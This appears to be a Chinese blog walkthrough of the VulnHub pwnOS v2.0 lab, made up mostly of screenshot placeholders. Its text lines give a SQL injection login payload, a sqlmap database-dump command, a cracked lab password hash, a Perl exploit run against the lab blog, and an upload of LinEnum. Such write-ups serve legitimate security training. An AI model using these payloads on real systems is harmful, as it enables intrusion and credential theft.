Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


vulnhub >_ PwnOS_v2.0

PwnOS_v2.0

image-20200610201133904

image-20200610201312543

nikto

image-20200610201535808

image-20200610201652233

image-20200610205402607

admin' or '1'='1'#

image-20200610205559588

登录无内容,保存登录包到文件,执行sqlmap注入

sqlmap -r login.txt  -dump

image-20200610212725066

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

image-20200610212952414

killerbeesareflying

另一页面

image-20200610215354192

image-20200610215318888

searchsploit

image-20200610215953606

image-20200610220014421

perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U evil -P evil

image-20200610215918661

image-20200610220117364

image-20200610220413203

image-20200610221755087

image-20200610221048765

image-20200610221833155

上传LinEnum到目标可写的/tmp,并执行

image-20200610223726170

image-20200610224133592

image-20200610222729375

image-20200610222755529

image-20200610222829813